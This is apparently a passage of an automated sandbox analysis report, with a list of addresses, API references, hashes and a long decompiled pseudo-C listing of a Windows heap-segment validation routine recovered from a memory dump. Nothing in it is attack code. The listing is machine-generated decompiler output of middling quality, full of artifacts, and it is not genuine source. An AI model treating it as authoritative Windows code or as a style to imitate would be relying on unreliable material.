                                                                                                                            0x6b1fa748
                                                                                                                            0x6b241f4d
                                                                                                                            0x6b241f50
                                                                                                                            0x6b241f56
                                                                                                                            0x6b241f5c
                                                                                                                            0x6b241f5f
                                                                                                                            0x6b241f7e
                                                                                                                            0x6b241f83
                                                                                                                            0x6b241f61
                                                                                                                            0x6b241f76
                                                                                                                            0x6b241f7b
                                                                                                                            0x6b241f89
                                                                                                                            0x6b241f8e
                                                                                                                            0x6b241f93
                                                                                                                            0x6b241f94
                                                                                                                            0x6b241f9a
                                                                                                                            0x6b241f9c
                                                                                                                            0x6b241f9e
                                                                                                                            0x6b241fa1
                                                                                                                            0x6b241fa1
                                                                                                                            0x6b241fa6
                                                                                                                            0x6b241fa6
                                                                                                                            0x6b241f50
                                                                                                                            0x6b1fa74e
                                                                                                                            0x6b1fa751
                                                                                                                            0x6b1fa754
                                                                                                                            0x6b1fa75d
                                                                                                                            0x6b1fa75e
                                                                                                                            0x6b1fa762
                                                                                                                            0x6b1fa767
                                                                                                                            0x6b241faf
                                                                                                                            0x6b241fb0
                                                                                                                            0x6b241fb9
                                                                                                                            0x6b241fbe
                                                                                                                            0x6b241fc2
                                                                                                                            0x6b241fc2
                                                                                                                            0x6b1fa76d
                                                                                                                            0x6b1fa76d
                                                                                                                            0x6b1fa775
                                                                                                                            0x6b1fa778
                                                                                                                            0x6b1fa77d
                                                                                                                            0x6b1fa77d
                                                                                                                            0x6b1fa71e
                                                                                                                            0x6b1fa782
                                                                                                                            0x6b1fa787
                                                                                                                            0x6b1fa789
                                                                                                                            0x6b241ff3
                                                                                                                            0x6b1fa78f
                                                                                                                            0x6b1fa78f
                                                                                                                            0x6b1fa78f
                                                                                                                            0x6b1fa791
                                                                                                                            0x6b1fa794
                                                                                                                            0x6b241ffd
                                                                                                                            0x6b242006
                                                                                                                            0x6b24200c
                                                                                                                            0x6b242017
                                                                                                                            0x6b242019
                                                                                                                            0x6b242024
                                                                                                                            0x6b242024
                                                                                                                            0x6b242024
                                                                                                                            0x6b242047
                                                                                                                            0x6b242047
                                                                                                                            0x6b24200c
                                                                                                                            0x6b1fa79a
                                                                                                                            0x6b1fa79f
                                                                                                                            0x6b1fa7a4
                                                                                                                            0x6b1fa7a9
                                                                                                                            0x6b1fa7ab
                                                                                                                            0x6b24205a
                                                                                                                            0x6b1fa7b1
                                                                                                                            0x6b1fa7b1
                                                                                                                            0x6b1fa7b1
                                                                                                                            0x6b1fa7b3
                                                                                                                            0x6b1fa7b6
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa7bc
                                                                                                                            0x6b242066
                                                                                                                            0x6b242068
                                                                                                                            0x6b242073
                                                                                                                            0x6b242073
                                                                                                                            0x6b242073
                                                                                                                            0x6b242078
                                                                                                                            0x6b242079
                                                                                                                            0x6b24207d
                                                                                                                            0x00000000
                                                                                                                            0x6b24207d
                                                                                                                            0x6b1fa7b6
                                                                                                                            0x6b1fa440
                                                                                                                            0x6b1fa440
                                                                                                                            0x6b1fa440
                                                                                                                            0x6b1fa446
                                                                                                                            0x6b1fa44c
                                                                                                                            0x6b1fa44f
                                                                                                                            0x6b1fa453
                                                                                                                            0x6b1fa455
                                                                                                                            0x6b2420b3
                                                                                                                            0x6b2420b9
                                                                                                                            0x6b2420b9
                                                                                                                            0x6b1fa45d
                                                                                                                            0x6b1fa460
                                                                                                                            0x6b1fa464
                                                                                                                            0x6b1fa466
                                                                                                                            0x6b1fa46b
                                                                                                                            0x6b1fa46f
                                                                                                                            0x6b1fa471
                                                                                                                            0x6b1fa471
                                                                                                                            0x6b1fa471
                                                                                                                            0x6b1fa474
                                                                                                                            0x6b1fa479
                                                                                                                            0x6b1fa47d
                                                                                                                            0x6b1fa47f
                                                                                                                            0x6b242229
                                                                                                                            0x6b24222f
                                                                                                                            0x6b1fa3c8
                                                                                                                            0x6b1fa3c8
                                                                                                                            0x6b1fa3ca
                                                                                                                            0x6b1fa3ca
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa3ca
                                                                                                                            0x6b242235
                                                                                                                            0x6b24223a
                                                                                                                            0x6b24223a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b242240
                                                                                                                            0x6b242246
                                                                                                                            0x6b24224a
                                                                                                                            0x6b242269
                                                                                                                            0x6b24226e
                                                                                                                            0x6b24224c
                                                                                                                            0x6b242261
                                                                                                                            0x6b242266
                                                                                                                            0x6b242274
                                                                                                                            0x6b242279
                                                                                                                            0x6b24227e
                                                                                                                            0x6b242286
                                                                                                                            0x6b242288
                                                                                                                            0x6b24228d
                                                                                                                            0x6b24228d
                                                                                                                            0x6b242292
                                                                                                                            0x6b242292
                                                                                                                            0x6b242295
                                                                                                                            0x6b242295
                                                                                                                            0x00000000
                                                                                                                            0x6b242295
                                                                                                                            0x6b1fa485
                                                                                                                            0x6b1fa489
                                                                                                                            0x6b1fa48b
                                                                                                                            0x6b1fa48f
                                                                                                                            0x6b1fa493
                                                                                                                            0x6b1fa497
                                                                                                                            0x6b1fa49b
                                                                                                                            0x6b1fa4bb
                                                                                                                            0x6b1fa4bb
                                                                                                                            0x6b1fa4bd
                                                                                                                            0x6b1fa4ff
                                                                                                                            0x6b1fa4ff
                                                                                                                            0x6b1fa501
                                                                                                                            0x6b1fa505
                                                                                                                            0x6b1fa50f
                                                                                                                            0x6b1fa517
                                                                                                                            0x6b1fa51b
                                                                                                                            0x6b1fa527
                                                                                                                            0x6b1fa52b
                                                                                                                            0x6b242182
                                                                                                                            0x6b242185
                                                                                                                            0x6b242193
                                                                                                                            0x6b242199
                                                                                                                            0x6b242199
                                                                                                                            0x6b1fa531
                                                                                                                            0x6b1fa535
                                                                                                                            0x6b1fa538
                                                                                                                            0x6b1fa548
                                                                                                                            0x6b1fa54b
                                                                                                                            0x6b1fa54d
                                                                                                                            0x6b1fa553
                                                                                                                            0x6b1fa559
                                                                                                                            0x6b242100
                                                                                                                            0x6b242103
                                                                                                                            0x6b242109
                                                                                                                            0x6b24210f
                                                                                                                            0x6b242112
                                                                                                                            0x6b242131
                                                                                                                            0x6b242136
                                                                                                                            0x6b242114
                                                                                                                            0x6b242129
                                                                                                                            0x6b24212e
                                                                                                                            0x6b24213c
                                                                                                                            0x6b242141
                                                                                                                            0x6b242147
                                                                                                                            0x6b24214d
                                                                                                                            0x6b242151
                                                                                                                            0x6b242154
                                                                                                                            0x6b242154
                                                                                                                            0x6b242159
                                                                                                                            0x6b242159
                                                                                                                            0x6b242103
                                                                                                                            0x6b1fa55f
                                                                                                                            0x6b1fa562
                                                                                                                            0x6b1fa565
                                                                                                                            0x6b1fa567
                                                                                                                            0x6b242162
                                                                                                                            0x6b1fa56d
                                                                                                                            0x6b1fa574
                                                                                                                            0x6b1fa575
                                                                                                                            0x6b1fa579
                                                                                                                            0x6b1fa57e
                                                                                                                            0x6b242169
                                                                                                                            0x6b24216a
                                                                                                                            0x6b242170
                                                                                                                            0x6b242175
                                                                                                                            0x6b242179
                                                                                                                            0x6b242179
                                                                                                                            0x6b1fa57e
                                                                                                                            0x6b1fa584
                                                                                                                            0x6b1fa58f
                                                                                                                            0x6b1fa58f
                                                                                                                            0x6b1fa52b
                                                                                                                            0x6b1fa5ad
                                                                                                                            0x6b1fa5bc
                                                                                                                            0x6b1fa5c1
                                                                                                                            0x6b1fa5c6
                                                                                                                            0x6b1fa5cb
                                                                                                                            0x6b1fa5cd
                                                                                                                            0x6b2421a9
                                                                                                                            0x6b1fa5d3
                                                                                                                            0x6b1fa5d3
                                                                                                                            0x6b1fa5d3
                                                                                                                            0x6b1fa5d5
                                                                                                                            0x6b1fa5d8
                                                                                                                            0x6b2421b3
                                                                                                                            0x6b2421bc
                                                                                                                            0x6b2421c2
                                                                                                                            0x6b2421cd
                                                                                                                            0x6b2421cf
                                                                                                                            0x6b2421da
                                                                                                                            0x6b2421da
                                                                                                                            0x6b2421da
                                                                                                                            0x6b2421f7
                                                                                                                            0x6b2421f7
                                                                                                                            0x6b2421c2
                                                                                                                            0x6b1fa5de
                                                                                                                            0x6b1fa5e3
                                                                                                                            0x6b1fa5e8
                                                                                                                            0x6b1fa5ea
                                                                                                                            0x6b24220a
                                                                                                                            0x6b1fa5f0
                                                                                                                            0x6b1fa5f0
                                                                                                                            0x6b1fa5f0
                                                                                                                            0x6b1fa5f2
                                                                                                                            0x6b1fa5f5
                                                                                                                            0x6b242219
                                                                                                                            0x6b24221b
                                                                                                                            0x6b24208c
                                                                                                                            0x6b24208c
                                                                                                                            0x6b24208c
                                                                                                                            0x6b242095
                                                                                                                            0x6b242096
                                                                                                                            0x6b242097
                                                                                                                            0x6b242098
                                                                                                                            0x6b2420a4
                                                                                                                            0x6b2420a5
                                                                                                                            0x6b2420a9
                                                                                                                            0x6b2420a9
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa5f5
                                                                                                                            0x6b1fa4bf
                                                                                                                            0x6b1fa4d3
                                                                                                                            0x6b1fa4d8
                                                                                                                            0x6b1fa4da
                                                                                                                            0x6b241ede
                                                                                                                            0x6b241ede
                                                                                                                            0x6b241ee4
                                                                                                                            0x6b241ee9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b241f07
                                                                                                                            0x00000000
                                                                                                                            0x6b241f07
                                                                                                                            0x6b1fa4e0
                                                                                                                            0x6b1fa4e5
                                                                                                                            0x6b1fa4e7
                                                                                                                            0x6b2420cb
                                                                                                                            0x6b1fa4ed
                                                                                                                            0x6b1fa4ed
                                                                                                                            0x6b1fa4ed
                                                                                                                            0x6b1fa4f2
                                                                                                                            0x6b1fa4f5
                                                                                                                            0x6b2420d5
                                                                                                                            0x6b2420de
                                                                                                                            0x6b2420e4
                                                                                                                            0x6b2420f6
                                                                                                                            0x6b2420f6
                                                                                                                            0x6b2420e4
                                                                                                                            0x6b1fa4fb
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa4fb
                                                                                                                            0x6b1fa4a1
                                                                                                                            0x6b1fa4a4
                                                                                                                            0x6b1fa4a8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa4aa
                                                                                                                            0x6b1fa4ac
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa4b2
                                                                                                                            0x6b1fa4b5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa4b5
                                                                                                                            0x6b1fa43a
                                                                                                                            0x6b1fa340
                                                                                                                            0x6b1fa346
                                                                                                                            0x6b1fa600
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa600
                                                                                                                            0x6b1fa34f
                                                                                                                            0x6b1fa351
                                                                                                                            0x6b1fa358
                                                                                                                            0x6b1fa3c6
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa371
                                                                                                                            0x6b1fa37a
                                                                                                                            0x6b1fa37f
                                                                                                                            0x6b1fa382
                                                                                                                            0x6b1fa384
                                                                                                                            0x6b1fa394
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa396
                                                                                                                            0x6b1fa399
                                                                                                                            0x6b1fa3a7
                                                                                                                            0x6b1fa3b0
                                                                                                                            0x6b1fa3b4
                                                                                                                            0x6b1fa3bb
                                                                                                                            0x6b1fa3d2
                                                                                                                            0x6b1fa3da
                                                                                                                            0x6b1fa3df
                                                                                                                            0x6b1fa3e1
                                                                                                                            0x6b1fa3e5
                                                                                                                            0x6b1fa3ea
                                                                                                                            0x6b1fa3f0
                                                                                                                            0x6b1fa3f0
                                                                                                                            0x6b1fa3e1
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa3bb
                                                                                                                            0x6b1fa394

                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,00004000), ref: 6B1FA4E0
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,-000000E8,?,?,?), ref: 6B1FA5C1
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,-000000E8,?,?,?), ref: 6B1FA5DE
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,00004000), ref: 6B1FA676
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1FA782
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1FA79A
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B242012
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B242061
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,-000000E8,?,?,?), ref: 6B242214
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 1007659313-523794902
                                                                                                                            • Opcode ID: 495aadfc7b3b87db6d7b77bf1aee8b2a7523d86d535f56fa4e07b1a52b804700
                                                                                                                            • Instruction ID: 5d481da61b265ac1d473a9cbc935646fcb59a45a97873d6d21104662206f247a
                                                                                                                            • Opcode Fuzzy Hash: 495aadfc7b3b87db6d7b77bf1aee8b2a7523d86d535f56fa4e07b1a52b804700
                                                                                                                            • Instruction Fuzzy Hash: 4C42CD70628745AFC705CF39C484B2ABBF9EF89708F044969E495CB691D73CD982CB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B294AEF, Relevance: 47.8, APIs: 18, Strings: 9, Instructions: 529COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 59%
                                                                                                                            			E6B294AEF(signed int __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				signed int _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E6B1DB150();
						} else {
							E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E6B1DB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E6B1DB150();
					} else {
						E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E6B28FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E6B1DB150();
						} else {
							E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E6B1DB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E6B1DB150();
								} else {
									E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E6B1DB150();
									} else {
										E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E6B1DB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E6B28FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E6B1DB150();
										} else {
											E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E6B22D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E6B1DB150();
								} else {
									E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E6B29A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E6B1FE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E6B29A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E6B1FE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E6B1FA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E6B1FA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E6B1FBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E6B2823E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E6B1D1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
